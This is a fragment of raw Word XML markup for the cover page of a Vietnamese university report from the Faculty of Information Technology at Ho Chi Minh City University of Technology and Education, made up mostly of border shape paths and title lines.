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C579" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4D2CF87B" wp14:editId="51455CC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-114299</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-177799</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6113780" cy="9057005"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="256" name="Group 256"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6113780" cy="9057005"/>
                          <a:chOff x="2289110" y="0"/>
                          <a:chExt cx="6113780" cy="7560000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1" name="Group 1"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2289110" y="0"/>
                            <a:ext cx="6113780" cy="7560000"/>
                            <a:chOff x="2289110" y="0"/>
                            <a:chExt cx="6113780" cy="7560000"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="2" name="Rectangle 2"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="2289110" y="0"/>
                              <a:ext cx="6113775" cy="7560000"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="4EC21A3A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">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2289110" y="0"/>
                              <a:ext cx="6113780" cy="7560000"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="9158" cy="14683"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="4" name="Rectangle 4"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="9150" cy="14675"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:noFill/>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="31BFD437" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                                  <w:pPr>
                                    <w:spacing w:line="240" w:lineRule="auto"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="5" name="Freeform: Shape 5"/>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6" name="Freeform: Shape 6"/>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7" name="Freeform: Shape 7"/>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8" name="Freeform: Shape 8"/>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9" name="Freeform: Shape 9"/>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0" name="Freeform: Shape 10"/>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1" name="Freeform: Shape 11"/>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2" name="Freeform: Shape 12"/>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3" name="Freeform: Shape 13"/>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4" name="Freeform: Shape 14"/>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5" name="Freeform: Shape 15"/>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6" name="Freeform: Shape 16"/>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7" name="Freeform: Shape 17"/>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8" name="Freeform: Shape 18"/>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9" name="Freeform: Shape 19"/>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20" name="Freeform: Shape 20"/>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1" name="Freeform: Shape 21"/>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2" name="Freeform: Shape 22"/>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3" name="Freeform: Shape 23"/>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4" name="Freeform: Shape 24"/>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5" name="Freeform: Shape 25"/>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6" name="Freeform: Shape 26"/>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7" name="Freeform: Shape 27"/>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8" name="Freeform: Shape 28"/>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9" name="Freeform: Shape 29"/>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30" name="Freeform: Shape 30"/>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1" name="Freeform: Shape 31"/>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257" name="Freeform: Shape 257"/>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258" name="Freeform: Shape 258"/>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259" name="Freeform: Shape 259"/>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260" name="Freeform: Shape 260"/>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261" name="Freeform: Shape 261"/>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262" name="Freeform: Shape 262"/>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263" name="Freeform: Shape 263"/>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264" name="Freeform: Shape 264"/>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265" name="Freeform: Shape 265"/>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266" name="Freeform: Shape 266"/>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267" name="Freeform: Shape 267"/>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268" name="Freeform: Shape 268"/>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269" name="Freeform: Shape 269"/>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270" name="Freeform: Shape 270"/>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271" name="Freeform: Shape 271"/>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272" name="Freeform: Shape 272"/>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273" name="Freeform: Shape 273"/>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274" name="Freeform: Shape 274"/>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275" name="Freeform: Shape 275"/>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276" name="Freeform: Shape 276"/>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277" name="Rectangle 277"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="134" y="3052"/>
                                <a:ext cx="82" cy="8506"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="005196"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="6BE5D58A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                                  <w:pPr>
                                    <w:spacing w:line="240" w:lineRule="auto"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="278" name="Rectangle 278"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="2462" y="163"/>
                                <a:ext cx="4253" cy="86"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="005196"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="454F99E4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                                  <w:pPr>
                                    <w:spacing w:line="240" w:lineRule="auto"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="279" name="Freeform: Shape 279"/>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280" name="Freeform: Shape 280"/>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281" name="Freeform: Shape 281"/>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282" name="Freeform: Shape 282"/>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283" name="Freeform: Shape 283"/>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284" name="Freeform: Shape 284"/>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285" name="Freeform: Shape 285"/>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286" name="Freeform: Shape 286"/>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287" name="Freeform: Shape 287"/>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288" name="Freeform: Shape 288"/>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289" name="Freeform: Shape 289"/>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290" name="Freeform: Shape 290"/>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291" name="Freeform: Shape 291"/>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292" name="Freeform: Shape 292"/>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293" name="Freeform: Shape 293"/>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294" name="Freeform: Shape 294"/>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295" name="Rectangle 295"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="2462" y="14467"/>
                                <a:ext cx="4253" cy="86"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="005196"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="4BD40BF7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                                  <w:pPr>
                                    <w:spacing w:line="240" w:lineRule="auto"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="296" name="Rectangle 296"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="8933" y="3115"/>
                                <a:ext cx="86" cy="8505"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="005196"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="2F4D4BD5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                                  <w:pPr>
                                    <w:spacing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4D2CF87B" id="Group 256" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-9pt;margin-top:-14pt;width:481.4pt;height:713.15pt;z-index:251658240" coordorigin="22891" coordsize="6113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">
                <v:group id="Group 1" o:spid="_x0000_s1027" style="position:absolute;left:22891;width:61137;height:75600" coordorigin="22891" coordsize="6113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2891;width:611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EC21A3A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                          <w:pPr>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                  </v:rect>
                  <v:group id="Group 3" o:spid="_x0000_s1029" style="position:absolute;left:22891;width:61137;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1BFD437" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:shape id="Freeform: Shape 5" o:spid="_x0000_s1031"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6" o:spid="_x0000_s1032"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" path="m38,182r10,-9l58,153r9,-19l77,105r,-24l77,53r,-24l72,,67,19,62,43,58,57,53,77,43,86,34,96r-15,l,91r38,91xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 7" o:spid="_x0000_s1033"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" path="m53,77l57,53,62,39,57,20,53,5,43,5,38,,33,,29,5r-5,l19,10r-5,5l9,20,,29,,48,5,63,9,77r10,5l29,87,43,82,53,77xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 8" o:spid="_x0000_s1034"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9" o:spid="_x0000_s1035"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0" o:spid="_x0000_s1036"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1" o:spid="_x0000_s1037"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2" o:spid="_x0000_s1038"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" path="m116,l101,14,87,24,72,33,58,43,39,48r-15,l10,52,,48,5,62,15,72r9,9l34,91r10,9l53,110r5,5l68,115r-10,5l53,129r-9,5l39,144r-5,14l34,168r,14l44,192,159,48,116,xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 13" o:spid="_x0000_s1039"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Shape 14" o:spid="_x0000_s1040"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5" o:spid="_x0000_s1041"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TwwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4X9j+EG/imaQuT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CqrzTw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6" o:spid="_x0000_s1042"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" path="m,52l10,38,24,24,43,14,63,9,82,4,106,r19,4l149,9,130,19r-15,5l101,28,87,38,77,48,72,62,67,76r5,20l,52xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 17" o:spid="_x0000_s1043"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" path="m9,14l14,4r10,l33,r5,l43,,53,4r4,l62,14r5,14l67,38,57,52,53,67r-5,5l43,76r-10,l29,76,24,72r-10,l9,67r,-5l5,52,,38,,24,9,14xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 18" o:spid="_x0000_s1044"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9" o:spid="_x0000_s1045"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Shape 20" o:spid="_x0000_s1046"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" path="m149,34l130,53,115,77,96,96,82,115,67,135r-9,14l43,163r-5,5l34,173r-5,l19,168r-9,l5,159,,149,,139,10,125,24,111,38,91,58,72,77,53,91,29,106,15,115,r5,l149,34xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 21" o:spid="_x0000_s1047"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2" o:spid="_x0000_s1048"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" path="m33,l48,10r9,19l67,48r5,29l76,101r,29l76,154r-4,29l67,159,62,144,57,125,52,106,43,91,33,87r-14,l,87,33,xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 23" o:spid="_x0000_s1049"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" path="m53,9r5,19l63,48,58,67,53,81r-9,l39,86r-5,l29,81r-5,l20,76,15,72,5,67,,52,,38,5,24,10,9,20,4,29,,44,r9,9xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 24" o:spid="_x0000_s1050"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5" o:spid="_x0000_s1051"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6" o:spid="_x0000_s1052"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7" o:spid="_x0000_s1053"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8" o:spid="_x0000_s1054"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" path="m115,187l101,177,86,163,72,158,58,149,38,144r-14,l10,139,,144,5,129r9,-9l24,110r10,-9l43,91,53,86r5,-9l67,77,58,72,48,62,43,57,38,48,34,33,29,24,34,9,43,,158,144r-43,43xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 29" o:spid="_x0000_s1055"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30" o:spid="_x0000_s1056"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" path="m29,183l43,164,62,144,77,120,96,101,110,82,120,68,130,53r4,-5l139,39r,-10l139,20,134,10,130,5,120,,110,r-9,10l91,24,77,44,58,68,43,92,24,111,14,130,5,144,,149r29,34xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 31" o:spid="_x0000_s1057"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257" o:spid="_x0000_s1058"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" path="m,43l9,62,24,72,43,86r19,5l81,96r24,l125,96r19,-5l129,82,115,77,101,67,86,62,77,53,72,38,67,24,72,,,43xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 258" o:spid="_x0000_s1059"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" path="m5,62l15,72r9,l34,77r5,l44,77r9,-5l58,72,63,62,68,48r,-10l58,24,53,10,48,5,44,,34,,29,,20,5r-5,l10,10,5,14,,24,,38,,53r5,9xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 259" o:spid="_x0000_s1060"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260" o:spid="_x0000_s1061"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" path="m,53r48,62l81,187r34,77l139,346r19,86l163,523r,96l153,710r82,101l249,730r5,-92l254,542,249,442,235,341,211,240,182,149,144,62r-5,l129,62,115,58,105,53,96,48,86,34,77,24,62,5,57,,48,,43,5,33,14,29,29,19,38,9,48,,53xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 261" o:spid="_x0000_s1062"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" path="m,140l19,120,34,96,53,77,67,58,82,39,96,24,106,10r4,-5l115,r10,l134,r5,5l149,15r,9l149,34,139,44r-9,19l110,82,96,101,77,125,58,144,43,159r-9,14l29,173,,140xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 262" o:spid="_x0000_s1063"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263" o:spid="_x0000_s1064"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" path="m39,182l29,173,20,153,10,134,5,105,,81,,53,,29,5,r5,19l20,43r4,14l29,77r5,9l44,96r14,l77,91,39,182xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 264" o:spid="_x0000_s1065"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" path="m14,77l5,53,,39,5,20,14,5,24,,34,5r14,5l58,20r4,9l62,48,58,63,53,77,43,82r-9,5l24,82,14,77xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 265" o:spid="_x0000_s1066"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266" o:spid="_x0000_s1067"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267" o:spid="_x0000_s1068"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268" o:spid="_x0000_s1069"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269" o:spid="_x0000_s1070"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" path="m44,l58,14,72,24r15,9l106,43r14,5l135,48r14,4l164,48,154,62,144,72r-9,9l125,91r-9,9l106,110r-5,5l92,115r9,5l111,129r9,5l125,144r5,14l130,168r-5,14l120,192,,48,44,xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 270" o:spid="_x0000_s1071"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" path="m,52l9,72,19,86r5,24l29,129r4,15l38,168r,14l38,196r5,-9l53,177r9,-9l72,153r5,-9l86,134r5,-10l91,115r,9l101,134r4,10l115,153r5,5l129,158r10,-5l149,144,33,,,52xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 271" o:spid="_x0000_s1072"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Shape 272" o:spid="_x0000_s1073"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273" o:spid="_x0000_s1074"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" path="m149,52l134,38,120,24,106,14,86,9,62,4,43,,19,4,,9,14,19r15,5l43,28,58,38r9,10l72,62r5,14l72,96,149,52xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 274" o:spid="_x0000_s1075"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" path="m63,14l53,4,43,4,39,,29,,24,,19,4r-9,l10,14,,28,5,38r5,14l19,67r5,5l29,76r5,l39,76r9,-4l53,72r5,-5l63,62,67,52,72,38r,-14l63,14xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 275" o:spid="_x0000_s1076"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276" o:spid="_x0000_s1077"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277" o:spid="_x0000_s1078"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" fillcolor="#005196" stroked="f">
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="6BE5D58A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:rect id="Rectangle 278" o:spid="_x0000_s1079"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" fillcolor="#005196" stroked="f">
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="454F99E4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:shape id="Freeform: Shape 279" o:spid="_x0000_s1080"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Shape 280" o:spid="_x0000_s1081"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281" o:spid="_x0000_s1082"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" path="m43,l29,10,19,29,10,48,5,77,,101r,29l5,154r,29l15,159r4,-15l24,125r5,-19l39,91r9,-4l58,87r19,l43,xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 282" o:spid="_x0000_s1083"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" path="m9,9l,28,,48,,67,9,81r10,5l33,81,43,76r9,-9l57,52r,-14l52,24,48,9,43,4,28,,19,,9,9xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 283" o:spid="_x0000_s1084"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284" o:spid="_x0000_s1085"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285" o:spid="_x0000_s1086"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286" o:spid="_x0000_s1087"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287" o:spid="_x0000_s1088"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Shape 288" o:spid="_x0000_s1089"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" path="m,149l9,130,19,110,24,91,33,67,38,53r,-24l38,14,38,,48,10r4,9l62,29,72,43r9,10l86,62r5,10l91,82,96,72r4,-10l105,53,115,43r9,-5l134,38r10,5l153,53,38,197,,149xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 289" o:spid="_x0000_s1090"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Shape 290" o:spid="_x0000_s1091"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291" o:spid="_x0000_s1092"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" path="m149,43l139,62,125,72,105,86,86,91,67,96r-24,l19,96,,91,19,82,33,77,48,67r9,-5l72,53,77,38r,-14l72,r77,43xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 292" o:spid="_x0000_s1093"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" path="m57,62l48,72r-5,l33,77r-4,l19,77,14,72r-5,l5,62,,48,,38,5,24,14,10,19,5,24,r9,l38,r5,5l48,5r9,5l57,14r5,10l67,38r,15l57,62xe" fillcolor="#005196" stroked="f">
                      <v:path arrowok="t" o:extrusionok="f"/>
                    </v:shape>
                    <v:shape id="Freeform: Shape 293" o:spid="_x0000_s1094"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294" o:spid="_x0000_s1095"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295" o:spid="_x0000_s1096"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" fillcolor="#005196" stroked="f">
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="4BD40BF7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                    <v:rect id="Rectangle 296" o:spid="_x0000_s1097"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" fillcolor="#005196" stroked="f">
                      <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                        <w:txbxContent>
                          <w:p w14:paraId="2F4D4BD5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:rect>
                  </v:group>
                </v:group>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A6FB9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>BỘ GIÁO DỤC VÀ ĐÀO TẠO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713CF1F5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TP. HCM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B3778" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>KHOA CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BCCFD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5863C9F2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0747200F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6D050CD1" wp14:editId="75C9958C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2171700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>296545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1424940" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="0" distB="0"/>
            <wp:docPr id="38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
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1424940" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
